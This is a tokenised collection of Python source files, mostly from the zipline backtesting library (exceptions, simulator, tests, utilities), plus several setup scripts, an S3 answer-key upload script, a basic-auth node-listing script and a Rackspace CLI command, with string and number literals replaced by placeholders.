__calendar [ - ndates : ] , <EOL> columns = self . __assets [ : nassets ] , <EOL> dtype = bool , <EOL> ) <EOL> @ with_default_shape <EOL> def arange_data ( self , shape , dtype = float ) : <EOL> """<STR_LIT>""" <EOL> return arange ( prod ( shape ) , dtype = dtype ) . reshape ( shape ) <EOL> @ with_default_shape <EOL> def randn_data ( self , seed , shape ) : <EOL> """<STR_LIT>""" <EOL> return np . random . RandomState ( seed ) . randn ( * shape ) <EOL> @ with_default_shape <EOL> def eye_mask ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> return ~ np . eye ( * shape , dtype = bool ) <EOL> @ with_default_shape <EOL> def ones_mask ( self , shape ) : <EOL> return np . ones ( shape , dtype = bool ) </s>
<s> """<STR_LIT>""" <EOL> import hashlib <EOL> import boto <EOL> from . import answer_key <EOL> BUCKET_NAME = '<STR_LIT>' <EOL> def main ( ) : <EOL> with open ( answer_key . ANSWER_KEY_PATH , '<STR_LIT:r>' ) as f : <EOL> md5 = hashlib . md5 ( ) <EOL> while True : <EOL> buf = f . read ( <NUM_LIT> ) <EOL> if not buf : <EOL> break <EOL> md5 . update ( buf ) <EOL> local_hash = md5 . hexdigest ( ) <EOL> s3_conn = boto . connect_s3 ( ) <EOL> bucket = s3_conn . get_bucket ( BUCKET_NAME ) <EOL> key = boto . s3 . key . Key ( bucket ) <EOL> key . key = "<STR_LIT>" . format ( <EOL> local_hash = local_hash ) <EOL> key . set_contents_from_filename ( answer_key . ANSWER_KEY_PATH ) <EOL> key . set_acl ( '<STR_LIT>' ) <EOL> download_link = "<STR_LIT>" . format ( <EOL> bucket_name = BUCKET_NAME , <EOL> key = key . key ) <EOL> print ( "<STR_LIT>" . format ( key = key . key ) ) <EOL> print ( "<STR_LIT>" . format ( download_link = download_link ) ) <EOL> with open ( answer_key . ANSWER_KEY_CHECKSUMS_PATH , '<STR_LIT:a>' ) as checksum_file : <EOL> checksum_file . write ( local_hash ) <EOL> checksum_file . write ( "<STR_LIT:\n>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from six import itervalues <EOL> from unittest import TestCase <EOL> from numpy import ( <EOL> array , <EOL> float16 , <EOL> float32 , <EOL> float64 , <EOL> int16 , <EOL> int32 , <EOL> int64 , <EOL> ) <EOL> from pandas import Timestamp <EOL> from toolz import concat , keyfilter <EOL> from toolz import curry <EOL> from toolz . curried . operator import ne <EOL> from zipline . utils . functional import mapall as lazy_mapall <EOL> from zipline . utils . numpy_utils import ( <EOL> is_float , <EOL> is_int , <EOL> is_datetime , <EOL> make_datetime64D , <EOL> make_datetime64ns , <EOL> NaTns , <EOL> NaTD , <EOL> ) <EOL> def mapall ( * args ) : <EOL> "<STR_LIT>" <EOL> return list ( lazy_mapall ( * args ) ) <EOL> @ curry <EOL> def make_array ( dtype , value ) : <EOL> return array ( [ value ] , dtype = dtype ) <EOL> CASES = { <EOL> int : mapall ( <EOL> ( int , int16 , int32 , int64 , make_array ( int ) ) , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> ) , <EOL> float : mapall ( <EOL> ( float16 , float32 , float64 , float , make_array ( float ) ) , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:1.> , - <NUM_LIT:1.> , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) , - float ( '<STR_LIT>' ) ] , <EOL> ) , <EOL> datetime : mapall ( <EOL> ( <EOL> make_datetime64D , <EOL> make_datetime64ns , <EOL> Timestamp , <EOL> make_array ( '<STR_LIT>' ) , <EOL> ) , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> ) + [ NaTD , NaTns ] , <EOL> } <EOL> def everything_but ( k , d ) : <EOL> """<STR_LIT>""" <EOL> assert k in d <EOL> return concat ( itervalues ( keyfilter ( ne ( k ) , d ) ) ) <EOL> class TypeCheckTestCase ( TestCase ) : <EOL> def test_is_float ( self ) : <EOL> for good_value in CASES [ float ] : <EOL> self . assertTrue ( is_float ( good_value ) ) <EOL> for bad_value in everything_but ( float , CASES ) : <EOL> self . assertFalse ( is_float ( bad_value ) ) <EOL> def test_is_int ( self ) : <EOL> for good_value in CASES [ int ] : <EOL> self . assertTrue ( is_int ( good_value ) ) <EOL> for bad_value in everything_but ( int , CASES ) : <EOL> self . assertFalse ( is_int ( bad_value ) ) <EOL> def test_is_datetime ( self ) : <EOL> for good_value in CASES [ datetime ] : <EOL> self . assertTrue ( is_datetime ( good_value ) ) <EOL> for bad_value in everything_but ( datetime , CASES ) : <EOL> self . assertFalse ( is_datetime ( bad_value ) ) </s>
<s> from zipline . utils . memoize import lazyval <EOL> class ZiplineError ( Exception ) : <EOL> msg = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . kwargs = kwargs <EOL> @ lazyval <EOL> def message ( self ) : <EOL> return str ( self ) <EOL> def __str__ ( self ) : <EOL> msg = self . msg . format ( ** self . kwargs ) <EOL> return msg <EOL> __unicode__ = __str__ <EOL> __repr__ = __str__ <EOL> class NoTradeDataAvailable ( ZiplineError ) : <EOL> pass <EOL> class NoTradeDataAvailableTooEarly ( NoTradeDataAvailable ) : <EOL> msg = "<STR_LIT>" <EOL> class NoTradeDataAvailableTooLate ( NoTradeDataAvailable ) : <EOL> msg = "<STR_LIT>" <EOL> class BenchmarkAssetNotAvailableTooEarly ( NoTradeDataAvailableTooEarly ) : <EOL> pass <EOL> class BenchmarkAssetNotAvailableTooLate ( NoTradeDataAvailableTooLate ) : <EOL> pass <EOL> class InvalidBenchmarkAsset ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class WrongDataForTransform ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class UnsupportedSlippageModel ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SetSlippagePostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SetCancelPolicyPostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class RegisterTradingControlPostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class RegisterAccountControlPostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class UnsupportedCommissionModel ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class UnsupportedCancelPolicy ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SetCommissionPostInit ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TransactionWithNoVolume ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TransactionWithWrongDirection ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TransactionWithNoAmount ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TransactionVolumeExceedsOrder ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class UnsupportedOrderParameters ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class CannotOrderDelistedAsset ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class BadOrderParameters ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class OrderDuringInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class SetBenchmarkOutsideInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class AccountControlViolation ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TradingControlViolation ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class IncompatibleHistoryFrequency ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class HistoryInInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class OrderInBeforeTradingStart ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class MultipleSymbolsFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SymbolNotFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class RootSymbolNotFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SidsNotFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> @ lazyval <EOL> def plural ( self ) : <EOL> return len ( self . sids ) > <NUM_LIT:1> <EOL> @ lazyval <EOL> def sids ( self ) : <EOL> return self . kwargs [ '<STR_LIT>' ] <EOL> @ lazyval <EOL> def msg ( self ) : <EOL> if self . plural : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class EquitiesNotFound ( SidsNotFound ) : <EOL> """<STR_LIT>""" <EOL> @ lazyval <EOL> def msg ( self ) : <EOL> if self . plural : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class FutureContractsNotFound ( SidsNotFound ) : <EOL> """<STR_LIT>""" <EOL> @ lazyval <EOL> def msg ( self ) : <EOL> if self . plural : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class ConsumeAssetMetaDataError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class MapAssetIdentifierIndexError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SidAssignmentError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class NoSourceError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class PipelineDateError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class WindowLengthTooLong ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) . strip ( ) <EOL> class WindowLengthNotPositive ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> ) . strip ( ) <EOL> class WindowedInputToWindowedTerm ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class TermInputsNotSpecified ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class TermOutputsEmpty ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class WindowLengthNotSpecified ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> class InvalidTermParams ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class DTypeNotSpecified ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> class NotDType ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class UnsupportedDType ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class BadPercentileBounds ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class UnknownRankMethod ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class AttachPipelineAfterInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class PipelineOutputDuringInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class NoSuchPipeline ( ZiplineError , KeyError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class UnsupportedDataType ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class NoFurtherDataError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = '<STR_LIT>' <EOL> class UnsupportedDatetimeFormat ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class PositionTrackerMissingAssetFinder ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class AssetDBVersionError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class AssetDBImpossibleDowngrade ( ZiplineError ) : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class HistoryWindowStartsBeforeData ( ZiplineError ) : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) </s>
<s> from contextlib2 import ExitStack <EOL> from logbook import Logger , Processor <EOL> from pandas . tslib import normalize_date <EOL> from zipline . protocol import BarData <EOL> from zipline . utils . api_support import ZiplineAPI <EOL> from six import viewkeys <EOL> from zipline . gens . sim_engine import ( <EOL> BAR , <EOL> DAY_START , <EOL> DAY_END , <EOL> MINUTE_END <EOL> ) <EOL> log = Logger ( '<STR_LIT>' ) <EOL> class AlgorithmSimulator ( object ) : <EOL> EMISSION_TO_PERF_KEY_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def __init__ ( self , algo , sim_params , data_portal , clock , benchmark_source , <EOL> universe_func ) : <EOL> self . sim_params = sim_params <EOL> self . env = algo . trading_environment <EOL> self . data_portal = data_portal <EOL> self . algo = algo <EOL> self . algo_start = normalize_date ( self . sim_params . first_open ) <EOL> self . current_data = self . _create_bar_data ( universe_func ) <EOL> self . simulation_dt = None <EOL> self . previous_dt = self . algo_start <EOL> self . clock = clock <EOL> self . benchmark_source = benchmark_source <EOL> def inject_algo_dt ( record ) : <EOL> if '<STR_LIT>' not in record . extra : <EOL> record . extra [ '<STR_LIT>' ] = self . simulation_dt <EOL> self . processor = Processor ( inject_algo_dt ) <EOL> def get_simulation_dt ( self ) : <EOL> return self . simulation_dt <EOL> def _create_bar_data ( self , universe_func ) : <EOL> return BarData ( <EOL> data_portal = self . data_portal , <EOL> simulation_dt_func = self . get_simulation_dt , <EOL> data_frequency = self . sim_params . data_frequency , <EOL> universe_func = universe_func <EOL> ) <EOL> def transform ( self ) : <EOL> """<STR_LIT>""" <EOL> algo = self . algo <EOL> def every_bar ( dt_to_use , current_data = self . current_data , <EOL> handle_data = algo . event_manager . handle_data ) : <EOL> self . simulation_dt = dt_to_use <EOL> algo . on_dt_changed ( dt_to_use ) <EOL> blotter = algo . blotter <EOL> perf_tracker = algo . perf_tracker <EOL> new_transactions , new_commissions = blotter . get_transactions ( current_data ) <EOL> for transaction in new_transactions : <EOL> perf_tracker . process_transaction ( transaction ) <EOL> order = blotter . orders [ transaction . order_id ] <EOL> perf_tracker . process_order ( order ) <EOL> if new_commissions : <EOL> for commission in new_commissions : <EOL> perf_tracker . process_commission ( commission ) <EOL> handle_data ( algo , current_data , dt_to_use ) <EOL> new_orders = blotter . new_orders <EOL> blotter . new_orders = [ ] <EOL> if new_orders : <EOL> for new_order in new_orders : <EOL> perf_tracker . process_order ( new_order ) <EOL> self . algo . portfolio_needs_update = True <EOL> self . algo . account_needs_update = True <EOL> self . algo . performance_needs_update = True <EOL> def once_a_day ( midnight_dt , current_data = self . current_data , <EOL> data_portal = self . data_portal ) : <EOL> positions = algo . perf_tracker . position_tracker . positions <EOL> position_assets = algo . asset_finder . retrieve_all ( positions ) <EOL> self . simulation_dt = midnight_dt <EOL> algo . on_dt_changed ( midnight_dt ) <EOL> self . _cleanup_expired_assets ( midnight_dt , position_assets ) <EOL> perf_tracker = algo . perf_tracker <EOL> assets_we_care_about = viewkeys ( perf_tracker . position_tracker . positions ) | viewkeys ( algo . blotter . open_orders ) <EOL> if assets_we_care_about : <EOL> splits = data_portal . get_splits ( assets_we_care_about , <EOL> midnight_dt ) <EOL> if splits : <EOL> algo . blotter . process_splits ( splits ) <EOL> perf_tracker . position_tracker . handle_splits ( splits ) <EOL> algo . before_trading_start ( current_data ) <EOL> def handle_benchmark ( date , benchmark_source = self . benchmark_source ) : <EOL> algo . perf_tracker . all_benchmark_returns [ date ] = benchmark_source . get_value ( date ) <EOL> def on_exit ( ) : <EOL> self . benchmark_source = self . current_data = self . data_portal = None <EOL> with ExitStack ( ) as stack : <EOL> stack . callback ( on_exit ) <EOL> stack . enter_context ( self . processor ) <EOL> stack . enter_context ( ZiplineAPI ( self . algo ) ) <EOL> if algo . data_frequency == '<STR_LIT>' : <EOL> def execute_order_cancellation_policy ( ) : <EOL> algo . blotter . execute_cancel_policy ( DAY_END ) <EOL> else : <EOL> def execute_order_cancellation_policy ( ) : <EOL> pass <EOL> for dt , action in self . clock : <EOL> if action == BAR : <EOL> every_bar ( dt ) <EOL> elif action == DAY_START : <EOL> once_a_day ( dt ) <EOL> elif action == DAY_END : <EOL> execute_order_cancellation_policy ( ) <EOL> handle_benchmark ( normalize_date ( dt ) ) <EOL> yield self . _get_daily_message ( dt , algo , algo . perf_tracker ) <EOL> elif action == MINUTE_END : <EOL> handle_benchmark ( dt ) <EOL> minute_msg , daily_msg = self . _get_minute_message ( dt , algo , algo . perf_tracker ) <EOL> yield minute_msg <EOL> if daily_msg : <EOL> yield daily_msg <EOL> risk_message = algo . perf_tracker . handle_simulation_end ( ) <EOL> yield risk_message <EOL> def _cleanup_expired_assets ( self , dt , position_assets ) : <EOL> """<STR_LIT>""" <EOL> algo = self . algo <EOL> def past_auto_close_date ( asset ) : <EOL> acd = asset . auto_close_date <EOL> return acd is not None and acd <= dt <EOL> assets_to_clear = [ asset for asset in position_assets if past_auto_close_date ( asset ) ] <EOL> perf_tracker = algo . perf_tracker <EOL> data_portal = self . data_portal <EOL> for asset in assets_to_clear : <EOL> perf_tracker . process_close_position ( asset , dt , data_portal ) <EOL> blotter = algo . blotter <EOL> assets_to_cancel = set ( [ asset for asset in blotter . open_orders <EOL> if past_auto_close_date ( asset ) ] ) <EOL> for asset in assets_to_cancel : <EOL> blotter . cancel_all_orders_for_asset ( asset ) <EOL> def _get_daily_message ( self , dt , algo , perf_tracker ) : <EOL> """<STR_LIT>""" <EOL> perf_message = perf_tracker . handle_market_close_daily ( <EOL> dt , self . data_portal , <EOL> ) <EOL> perf_message [ '<STR_LIT>' ] [ '<STR_LIT>' ] = algo . recorded_vars <EOL> return perf_message <EOL> def _get_minute_message ( self , dt , algo , perf_tracker ) : <EOL> """<STR_LIT>""" <EOL> rvars = algo . recorded_vars <EOL> minute_message , daily_message = perf_tracker . handle_minute_close ( <EOL> dt , self . data_portal , <EOL> ) <EOL> minute_message [ '<STR_LIT>' ] [ '<STR_LIT>' ] = rvars <EOL> if daily_message : <EOL> daily_message [ "<STR_LIT>" ] [ "<STR_LIT>" ] = rvars <EOL> return minute_message , daily_message </s>
<s> from . _13d_filings import _13DFilingsLoader <EOL> from . earnings import EarningsCalendarLoader <EOL> from . consensus_estimates import ConsensusEstimatesLoader <EOL> from . buyback_auth import ( <EOL> CashBuybackAuthorizationsLoader , <EOL> ShareBuybackAuthorizationsLoader <EOL> ) <EOL> from . dividends import ( <EOL> DividendsByAnnouncementDateLoader , <EOL> DividendsByExDateLoader , <EOL> DividendsByPayDateLoader , <EOL> ) <EOL> from . equity_pricing_loader import USEquityPricingLoader <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from abc import ( <EOL> ABCMeta , <EOL> abstractproperty <EOL> ) <EOL> from six import with_metaclass <EOL> from zipline . protocol import DATASOURCE_TYPE <EOL> from zipline . protocol import Event <EOL> class DataSource ( with_metaclass ( ABCMeta ) ) : <EOL> @ property <EOL> def event_type ( self ) : <EOL> return DATASOURCE_TYPE . TRADE <EOL> @ property <EOL> def mapping ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> @ abstractproperty <EOL> def raw_data ( self ) : <EOL> """<STR_LIT>""" <EOL> NotImplemented <EOL> @ abstractproperty <EOL> def instance_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_hash ( self ) : <EOL> return self . __class__ . __name__ + "<STR_LIT:->" + self . instance_hash <EOL> def apply_mapping ( self , raw_row ) : <EOL> """<STR_LIT>""" <EOL> row = { } <EOL> row . update ( { '<STR_LIT:type>' : self . event_type } ) <EOL> row . update ( { target : mapping_func ( raw_row [ source_key ] ) <EOL> for target , ( mapping_func , source_key ) <EOL> in self . mapping . items ( ) } ) <EOL> row . update ( { '<STR_LIT>' : self . get_hash ( ) } ) <EOL> return row <EOL> @ property <EOL> def mapped_data ( self ) : <EOL> for row in self . raw_data : <EOL> yield Event ( self . apply_mapping ( row ) ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> return self . mapped_data . next ( ) <EOL> def __next__ ( self ) : <EOL> return next ( self . mapped_data ) </s>
<s> import math <EOL> def tolerant_equals ( a , b , atol = <NUM_LIT> , rtol = <NUM_LIT> ) : <EOL> return math . fabs ( a - b ) <= ( atol + rtol * math . fabs ( b ) ) <EOL> try : <EOL> import bottleneck as bn <EOL> nanmean = bn . nanmean <EOL> nanstd = bn . nanstd <EOL> nansum = bn . nansum <EOL> nanmax = bn . nanmax <EOL> nanmin = bn . nanmin <EOL> nanargmax = bn . nanargmax <EOL> nanargmin = bn . nanargmin <EOL> except ImportError : <EOL> import numpy as np <EOL> nanmean = np . nanmean <EOL> nanstd = np . nanstd <EOL> nansum = np . nansum <EOL> nanmax = np . nanmax <EOL> nanmin = np . nanmin <EOL> nanargmax = np . nanargmax <EOL> nanargmin = np . nanargmin <EOL> def round_if_near_integer ( a , epsilon = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if abs ( a - round ( a ) ) <= epsilon : <EOL> return round ( a ) <EOL> else : <EOL> return a </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> here = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> version_path = os . path . join ( here , '<STR_LIT>' ) <EOL> version = open ( version_path ) . read ( ) . strip ( ) <EOL> requires = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> CLASSIFIERS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> wsdl_files = [ '<STR_LIT>' + item for item in os . listdir ( '<STR_LIT>' ) ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> install_requires = requires , <EOL> include_package_data = True , <EOL> data_files = [ ( '<STR_LIT>' , wsdl_files ) ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> ) </s>
<s> </s>
<s> import os <EOL> import platform <EOL> from setuptools import setup <EOL> install_requires = [ ] <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif platform . system ( ) == "<STR_LIT>" : <EOL> install_requires = [ '<STR_LIT>' ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = "<STR_LIT>" , <EOL> description = ( "<STR_LIT>" ) , <EOL> url = "<STR_LIT>" , <EOL> download_url = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:html>' , '<STR_LIT>' ] , <EOL> install_requires = install_requires , <EOL> version = '<STR_LIT:1.0>' , <EOL> packages = [ '<STR_LIT>' , ] , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> ) </s>
<s> import pypandoc <EOL> with open ( '<STR_LIT>' , '<STR_LIT:wb>' ) as f : <EOL> f . write ( pypandoc . convert ( '<STR_LIT>' , '<STR_LIT>' ) . encode ( '<STR_LIT:utf-8>' ) ) </s>
<s> from distutils . core import setup <EOL> import py2exe <EOL> setup ( console = [ '<STR_LIT>' ] ) </s>
<s> import sys , json , httplib , base64 <EOL> if len ( sys . argv ) < <NUM_LIT:4> : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> server , port = sys . argv [ <NUM_LIT:1> ] . split ( "<STR_LIT::>" ) <EOL> username = sys . argv [ <NUM_LIT:2> ] <EOL> password = sys . argv [ <NUM_LIT:3> ] <EOL> conn = httplib . HTTPConnection ( server , port ) <EOL> path = "<STR_LIT>" <EOL> method = "<STR_LIT:GET>" <EOL> credentials = base64 . b64encode ( "<STR_LIT>" % ( username , password ) ) <EOL> conn . request ( method , path , "<STR_LIT>" , <EOL> { "<STR_LIT:Content-Type>" : "<STR_LIT:application/json>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + credentials } ) <EOL> response = conn . getresponse ( ) <EOL> if response . status > <NUM_LIT> : <EOL> print "<STR_LIT>" % ( response . status , <EOL> response . read ( ) ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> resp_payload = json . loads ( response . read ( ) ) <EOL> for node in resp_payload : <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT:\n>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> for app in node [ "<STR_LIT>" ] : <EOL> print "<STR_LIT>" % app <EOL> print "<STR_LIT>" % app <EOL> print "<STR_LIT>" % app <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> import logging <EOL> from raxcli . models import Collection <EOL> from raxcli . apps . monitoring . utils import MonitoringListCommand , get_client <EOL> from raxcli . apps . monitoring . resources import Entity <EOL> class ListCommand ( MonitoringListCommand ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ ) <EOL> def take_action ( self , parsed_args ) : <EOL> client = get_client ( parsed_args ) <EOL> marker = parsed_args . marker if parsed_args . marker else None <EOL> kwargs = { '<STR_LIT>' : marker } <EOL> entities = [ Entity ( entity ) <EOL> for entity in client . list_entities ( ** kwargs ) ] <EOL> collection = Collection ( entities ) <EOL> return collection . generate_output ( ) </s>
